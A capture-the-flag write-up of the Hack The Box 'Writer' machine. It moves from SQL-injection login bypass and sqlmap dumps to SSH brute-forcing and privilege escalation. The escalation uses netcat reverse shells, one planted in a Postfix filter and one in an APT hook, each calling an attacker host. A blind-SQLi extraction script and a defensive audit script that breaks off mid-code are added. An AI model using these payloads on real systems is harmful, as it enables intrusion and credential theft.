
Hack The Box - Writer Writeup

Antonette Caldwell • September 1, 2021

retired medium sql injection

Machine: Writer

This write-up was last updated January 26, 2022

Completed on September 30, 2021

1. Scan the machine

nmap -Pn -p- --min-rate=1000 -T3 10.10.11.101 -oA Writer
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 10:03 EST
Nmap scan report for 10.10.11.101
Host is up (0.057s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 20.32 seconds

2. Vulnerability Analysis

nmap -Pn -sC -sV -p 22,80,139,445 10.10.11.101 -oA WriterServices  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 10:09 EST
Nmap scan report for 10.10.11.101
Host is up (0.061s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
|   256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_  256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2022-01-26T15:24:53
|_  start_date: N/A
|_clock-skew: 15m10s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds

Since port 80 is open, I added 10.10.11.101 writer.htb to /etc/hosts so I could browse to the landing page. Before the website, though, let me check the other two open ports, 139 and 445 (SMB).

To look at the Samba service there are a couple of tools to choose from, such as smbmap and smbclient.

smbmap can be run with the guest account to list the shares on the server. Every share reports NO ACCESS, so a guest session cannot read any of them directly.

smbmap -u guest -H 10.10.11.101
[+] Guest session       IP: 10.10.11.101:445    Name: writer.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        writer2_project                                         NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (writer server (Samba, Ubuntu))

Let's try smbclient.

echo exit | smbclient -L \\\\10.10.11.101
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        writer2_project Disk      
        IPC$            IPC       IPC Service (writer server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

Since this was my first time really navigating a system that uses Samba, it took some research to work out what to do. After a few tries I ended up using enum4linux, which was helpful and pulled together pretty much everything I had already seen with the other tools.

I used nmblookup, a NetBIOS over TCP/IP client for looking up NetBIOS names.

nmblookup -A 10.10.11.101                                        
Looking up status of 10.10.11.101
        WRITER          <00> -         B <ACTIVE> 
        WRITER          <03> -         B <ACTIVE> 
        WRITER          <20> -         B <ACTIVE> 
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> 
        WORKGROUP       <00> - <GROUP> B <ACTIVE> 
        WORKGROUP       <1d> -         B <ACTIVE> 
        WORKGROUP       <1e> - <GROUP> B <ACTIVE> 

        MAC Address = 00-00-00-00-00-00

I also checked to see if I can establish a null login with rpcclient.

rpcclient -U "" -N 10.10.11.101
rpcclient $> enumdomusers
user:[kyle] rid:[0x3e8]
rpcclient $> queryuser 0x3e8
        User Name   :   kyle
        Full Name   :   Kyle Travis
        Home Drive  :   \\writer\kyle
        Dir Drive   :
        Profile Path:   \\writer\kyle\profile
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST
        Logoff Time              :      Wed, 06 Feb 2036 10:06:39 EST
        Kickoff Time             :      Wed, 06 Feb 2036 10:06:39 EST
        Password last set Time   :      Tue, 18 May 2021 13:03:35 EDT
        Password can change Time :      Tue, 18 May 2021 13:03:35 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x3e8
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
rpcclient $>

I only ran enumdomusers and found kyle. He may prove useful later. I went ahead and used enum4linux as well, which is what I reach for when all else seems to fail.

enum4linux -a 10.10.11.101
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jan 26 10:30:35 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.11.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.11.101    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 10.10.11.101    |
 ============================================ 
Looking up status of 10.10.11.101
        WRITER          <00> -         B <ACTIVE>  Workstation Service
        WRITER          <03> -         B <ACTIVE>  Messenger Service
        WRITER          <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.10.11.101    |
 ===================================== 
[+] Server 10.10.11.101 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.11.101    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.10.11.101    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.11.101 from smbclient: 
[+] Got OS info for 10.10.11.101 from srvinfo:
        WRITER         Wk Sv PrQ Unx NT SNT writer server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================= 
|    Users on 10.10.11.101    |
 ============================= 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: kyle     Name: Kyle Travis       Desc: 

user:[kyle] rid:[0x3e8]

 ========================================= 
|    Share Enumeration on 10.10.11.101    |
 ========================================= 
smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        writer2_project Disk      
        IPC$            IPC       IPC Service (writer server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.101
//10.10.11.101/print$   Mapping: DENIED, Listing: N/A
//10.10.11.101/writer2_project  Mapping: DENIED, Listing: N/A
//10.10.11.101/IPC$     [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ==================================================== 
|    Password Policy Information for 10.10.11.101    |
 ==================================================== 


[+] Attaching to 10.10.11.101 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] WRITER
        [+] Builtin

[+] Password Info for Domain: WRITER

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================== 
|    Groups on 10.10.11.101    |
 ============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.11.101 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1663171886-1921258872-720408159
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1663171886-1921258872-720408159 and logon username '', password ''
S-1-5-21-1663171886-1921258872-720408159-500 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-501 WRITER\nobody (Local User)
--snippet--
S-1-5-21-1663171886-1921258872-720408159-513 WRITER\None (Domain Group)
--snippet--
S-1-5-21-1663171886-1921258872-720408159-1000 WRITER\kyle (Local User)
--snippet--
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
--snippet--
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
--snippet--
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kyle (Local User)
S-1-22-1-1001 Unix User\john (Local User)

 ============================================= 
|    Getting printer info for 10.10.11.101    |
 ============================================= 
No printers returned.


enum4linux complete on Wed Jan 26 10:35:14 2022

While I was enumerating SMB, I went ahead and enumerated the website http://writer.htb as well. Last time I enumerated a website I used dirb and wfuzz; they are useful when other tools don't seem to work. Lately I've been using dirsearch, which is a pretty handy tool.

dirsearch -u http://writer.htb    

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/writer.htb/_22-01-26_10-32-02.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-01-26_10-32-02.log

Target: http://writer.htb/

[10:32:02] Starting: 
[10:32:12] 200 -    3KB - /about                                            
[10:32:18] 200 -    1KB - /administrative                                   
[10:32:24] 200 -    5KB - /contact                                          
[10:32:25] 302 -  208B  - /dashboard  ->  http://writer.htb/                
[10:32:33] 302 -  208B  - /logout  ->  http://writer.htb/                   
[10:32:42] 403 -  275B  - /server-status/                                   
[10:32:42] 403 -  275B  - /server-status                                    
[10:32:44] 301 -  309B  - /static  ->  http://writer.htb/static/            

Task Completed

Navigating to http://writer.htb/administrative displays a Bootstrap login page.

On the about page I noticed the signature Admin @ Writer.HTB, which hints at the privileged username. I wanted to test for injection vulnerabilities, so I entered admin ' or '1'='1 as the username with an arbitrary password, and I was logged in. The single quote ends the username literal and the injected or '1'='1 changes the WHERE clause so the query still matches the admin row whatever the password is.

The log in page redirected to http://writer.htb/dashboard.

There was a users page, and in the list there is admin with [email protected].

I then ran sqlmap against the login request, which I saved from Burp Suite to a file.

POST /administrative HTTP/1.1
Host: writer.htb
Content-Length: 51
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://writer.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://writer.htb/administrative
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

uname=admin&password=password

I ran sqlmap with the saved request, asking it to dump whatever it finds:

sqlmap -r request.txt --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:40:14 /2022-01-26/

[10:40:14] [INFO] parsing HTTP request from 'request.txt'
[10:40:14] [INFO] testing connection to the target URL
[10:40:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:40:14] [INFO] testing if the target URL content is stable
[10:40:14] [INFO] target URL content is stable
[10:40:14] [INFO] testing if POST parameter 'uname' is dynamic
[10:40:15] [WARNING] POST parameter 'uname' does not appear to be dynamic
[10:40:15] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[10:40:15] [INFO] testing for SQL injection on POST parameter 'uname'
[10:40:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:40:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:40:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:40:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:40:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:40:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:40:17] [INFO] testing 'Generic inline queries'
[10:40:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
got a refresh intent (redirect like response common to login pages) to '/dashboard'. Do you want to apply it from now on? [Y/n] Y
got a 302 redirect to 'http://writer.htb/'. Do you want to follow? [Y/n] Y
[10:41:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:41:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:41:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:41:42] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[10:42:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:42:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:42:06] [INFO] target URL appears to be UNION injectable with 6 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[10:42:29] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[10:42:29] [INFO] checking if the injection point on POST parameter 'uname' is a false positive
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 121 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 8931 FROM (SELECT(SLEEP(5)))syvT) AND 'MHHS'='MHHS&password=password
---
[10:42:51] [INFO] the back-end DBMS is MySQL
[10:42:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:43:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:43:01] [INFO] fetching current database
[10:43:01] [INFO] retrieved: 
[10:43:11] [INFO] adjusting time delay to 2 seconds due to good response times
writer
[10:43:49] [INFO] fetching tables for database: 'writer'
[10:43:49] [INFO] fetching number of tables for database 'writer'
[10:43:49] [INFO] retrieved: 3
[10:43:55] [INFO] retrieved: site
[10:44:22] [INFO] retrieved: stories
[10:45:04] [INFO] retrieved: users
[10:45:43] [INFO] fetching columns for table 'users' in database 'writer'
[10:45:43] [INFO] retrieved: 6
[10:45:50] [INFO] retrieved: id
[10:46:03] [INFO] retrieved: username
[10:46:52] [INFO] retrieved: password
[10:47:50] [INFO] retrieved: email
[10:48:19] [INFO] retrieved: status
[10:49:01] [INFO] retrieved: date_created
[10:50:18] [INFO] fetching entries for table 'users' in database 'writer'
[10:50:18] [INFO] fetching number of entries for table 'users' in database 'writer'
[10:50:18] [INFO] retrieved: 1
[10:50:21] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                                                                    
[10:50:34] [INFO] adjusting time delay to 1 second due to good response times

[10:50:38] [INFO] retrieved: [email protected]
[10:51:39] [INFO] retrieved: 1
[10:51:42] [INFO] retrieved: 118e48794631a9612484ca8b55f622d0
[10:53:52] [INFO] retrieved: Active
[10:54:12] [INFO] retrieved: admin
[10:54:29] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[14:17:19] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[14:17:23] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] NNN
[14:17:33] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[14:17:33] [INFO] starting 4 processes 
[14:17:41] [WARNING] no clear password(s) found                                                                                                                                                                                            
Database: writer
Table: users
[1 entry]
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email            | status | password                         | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1  | [email protected] | Active | 118e48794631a9612484ca8b55f622d0 | admin    | NULL         |
+----+------------------+--------+----------------------------------+----------+--------------+

Note: this step turned out to be unnecessary, since the login bypass had already got me in, but it is useful to know that the whole database can be read through this injection point. The password column holds an unsalted MD5 hash (sqlmap's md5_generic_passwd), which its default wordlist did not crack.
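To make the two things that happened here concrete, the quote-breaking login bypass and the blind extraction that sqlmap then spent a quarter of an hour on, here is an added example. It is my own code, not the Writer application's (the write-up never shows its source). It reconstructs a hypothetical login query against an in-memory SQLite copy of the users table from the dump, shows the bypass against it, recovers the admin hash through nothing but the login's yes/no answer by bisection, the way sqlmap's blind techniques work, and shows the parameterized version that defeats both. The login functions, the MD5 comparison, the placeholder email and the single-row table are assumptions; SQLite's unicode() stands in for MySQL's ORD(), and a boolean oracle replaces SLEEP() because SQLite has no sleep.

```python
import hashlib
import sqlite3

# Constructed stand-in for the writer database: the users columns are the ones
# sqlmap enumerated and the admin row carries the hash it dumped; the email is a
# placeholder, and the engine is in-memory SQLite rather than MariaDB.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, "
               "email TEXT, status TEXT, date_created TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', "
               "'118e48794631a9612484ca8b55f622d0', 'admin@example.invalid', "
               "'Active', NULL)")
    return db


def login_vulnerable(db, uname, password):
    """Hypothetical reconstruction of the /administrative flaw: the username
    is spliced into the SQL string, so quotes in it rewrite the query."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()  # unsalted MD5, as in the dump
    sql = (f"SELECT id FROM users WHERE username = '{uname}' "
           f"AND password = '{pw_hash}'")
    return db.execute(sql).fetchone() is not None


def login_fixed(db, uname, password):
    """Same check with bound parameters: the username is data, never SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (uname, pw_hash)).fetchone() is not None


# Bypass payload. No space before the quote, unlike the one typed into the
# form, because SQLite does not ignore trailing spaces in string comparison
# the way MySQL's default collations do.
BYPASS = "admin' or '1'='1"

ADMIN_HASH_QUERY = "SELECT password FROM users WHERE username='admin'"


def extract_blind(db, subquery, length, login=login_vulnerable):
    """Read a string out of the database through the login's yes/no answer.

    Each character is found by bisection over printable ASCII (32..126), which
    is how sqlmap's blind techniques work: at most 7 requests per character
    instead of up to 95. The trailing '-- ' comments out the password clause so
    only the injected comparison decides whether the login succeeds.
    Returns (recovered_string, number_of_requests).
    """
    recovered, requests = "", 0
    for pos in range(1, length + 1):
        lo, hi = 32, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f"admin' AND unicode(substr(({subquery}),{pos},1)) "
                       f"> {mid} -- ")
            requests += 1
            if login(db, payload, "x"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered, requests


if __name__ == "__main__":
    db = make_db()
    print("bypass on vulnerable login:", login_vulnerable(db, BYPASS, "whatever"))
    print("bypass on fixed login:     ", login_fixed(db, BYPASS, "whatever"))
    value, n = extract_blind(db, ADMIN_HASH_QUERY, 32)
    print(f"blind-extracted hash: {value} in {n} requests")
```

Against the fixed login the same extraction loop returns 32 spaces, because every oracle answer is "no": with bound parameters there is no condition of the attacker's to evaluate. The request count (around 200 for a 32-character hash) is also why sqlmap's time-based run above took so long, since each of those requests had to wait out a SLEEP.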

Enumerating the SMB service earlier had turned up the user kyle (the RID cycling in enum4linux also listed john). I tried brute-forcing kyle's SSH password with hydra and rockyou. Note that hydra itself recommends -t 4 for SSH because many sshd configurations cap parallel connections; -t 60 worked here but is aggressive.

hydra -l kyle -P /usr/share/wordlists/rockyou.txt.gz ssh://writer.htb -VV -f -t 60
--snippet--
[ATTEMPT] target writer.htb - login "kyle" - pass "missing" - 9377 of 14344520 [child 8] (0/121)
[ATTEMPT] target writer.htb - login "kyle" - pass "melrose" - 9378 of 14344520 [child 5] (0/121)
[ATTEMPT] target writer.htb - login "kyle" - pass "marcoantonio" - 9379 of 14344520 [child 47] (0/121)
[ATTEMPT] target writer.htb - login "kyle" - pass "lowell" - 9380 of 14344520 [child 36] (0/121)
[ATTEMPT] target writer.htb - login "kyle" - pass "liljay" - 9381 of 14344520 [child 1] (0/121)
[22][ssh] host: writer.htb   login: kyle   password: marcoantonio
[STATUS] attack finished for writer.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-26 11:09:18

With that I could SSH into the server as kyle and read user.txt.

Then I checked what kyle is allowed to do.

ssh kyle@10.10.11.101
The authenticity of host '10.10.11.101 (10.10.11.101)' can't be established.
ED25519 key fingerprint is SHA256:EcmD06Im3Ox+/6cWwJX2eaLFPlgm/TO0Jw20KJK1XSw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.101' (ED25519) to the list of known hosts.
kyle@10.10.11.101's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 26 Jan 19:48:38 UTC 2022

  System load:  0.0               Processes:             250
  Usage of /:   64.6% of 6.82GB   Users logged in:       0
  Memory usage: 22%               IPv4 address for eth0: 10.10.11.101
  Swap usage:   0%


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul 28 09:03:32 2021 from 10.10.14.19
kyle@writer:~$ id
uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),997(filter),1002(smbgroup)

Now we need to escalate privileges to get the root flag. First, what is listening locally:

netstat -punta | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::445                  :::*                    LISTEN      -                   
tcp6       0      0 :::139                  :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -

Check the other users with a login shell:

cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/bash

Take note: /etc/passwd shows a filter account described as Postfix Filters, and kyle's id output shows he is in the filter group. Postfix on this box runs a content-filter script, /etc/postfix/disclaimer, on the mail it delivers, and that group membership is what lets us modify the script (confirm with ls -l /etc/postfix/disclaimer before editing it). The plan is to plant a reverse shell in the script and then send john a mail so that Postfix runs it as john, since kyle alone has little access. The Python script below sends that mail through the local Postfix instance; you can create it on the target machine.

import smtplib

hostname = "127.0.0.1"   # Postfix only listens on loopback port 25 (see the netstat output)
port = 25
sender_email = "[email protected]"
receiver_email = "[email protected]"   # must be a local user whose mail passes through the disclaimer filter
message = "Hi! John I need reverse shell"

server = None
try:
    server = smtplib.SMTP(hostname, port)
    server.ehlo()
    server.sendmail(sender_email, receiver_email, message)
except Exception as e:
    print(e)
finally:
    if server is not None:   # only quit if the connection was actually opened
        server.quit()

Before sending the mail, add this line near the top of /etc/postfix/disclaimer (after the shebang) and have a listener ready on 10.10.14.14:4444. The filter runs the script for each message it handles, so sending the mail is what triggers the callback.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f

Catch the reverse shell, then read john's private key from /home/john/.ssh/id_rsa and paste it into a file on the attacking machine (chmod 600 it, or ssh will refuse to use it).

sudo pwncat -l 10.10.14.14 4444
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(john) gid=1001(john) groups=1001(john)
$ cd /home/john/.ssh
$ ls -al
total 20
drwx------ 2 john john 4096 Jul  9  2021 .
drwxr-xr-x 4 john john 4096 Aug  5 09:56 ..
-rw-r--r-- 1 john john  565 Jul  9  2021 authorized_keys
-rw------- 1 john john 2602 Jul  9  2021 id_rsa
-rw-r--r-- 1 john john  565 Jul  9  2021 id_rsa.pub
$ cat id_rsa

With the key saved locally, SSH in as john.

ssh -i id_rsa john@10.10.11.101
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 26 Jan 20:51:35 UTC 2022

  System load:  0.0               Processes:             257
  Usage of /:   64.7% of 6.82GB   Users logged in:       1
  Memory usage: 22%               IPv4 address for eth0: 10.10.11.101
  Swap usage:   0%


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul 28 09:19:58 2021 from 10.10.14.19
john@writer:~$

Do another reverse shell as john, this time through an APT hook. Confirm first that john can write to /etc/apt/apt.conf.d (ls -ld /etc/apt/apt.conf.d; a full SSH login picks up supplementary group memberships that the Postfix-spawned shell, which showed only groups=1001(john), did not). APT reads every file in that directory, and an APT::Update::Pre-Invoke directive runs its command as root before the next apt-get update, so a file with a callback to port 3333 is enough. Start the listener before root's next update runs:

echo 'APT::Update::Pre-Invoke: {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 3333 >/tmp/f"};' > /etc/apt/apt.conf.d/shell
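Both steps of the privilege escalation rest on file permissions an audit can catch: a Postfix filter script that a non-root group can edit, and an apt.conf.d directory that a non-root user can drop hook files into. The following is an added example of such a check, my own code and not something from this write-up or the Writer box. It walks a directory for group- or world-writable entries and parses apt.conf fragments for the directives that make apt run commands as root. The temp-directory fixture it builds, holding the Pre-Invoke line from above and a mock disclaimer script, is constructed for the demo, and the modes it sets (a group-writable filter script, a group-writable apt.conf.d) are my assumption about how the box was configured, not something the write-up shows.

```python
import os
import re
import stat
import tempfile

# apt.conf directives that make apt or dpkg run a shell command as root.
HOOK_RE = re.compile(
    r'(APT::Update::(?:Pre|Post)-Invoke|DPkg::(?:Pre|Post)-Invoke'
    r'|DPkg::Pre-Install-Pkgs)\s*:{0,2}\s*\{?\s*"((?:[^"\\]|\\.)*)"')


def find_apt_hooks(confdir):
    """Return (file, directive, command) for every hook directive under confdir.
    Only an administrator should ever add one of these, so an entry in a file
    you did not put there deserves a look."""
    hits = []
    for name in sorted(os.listdir(confdir)):
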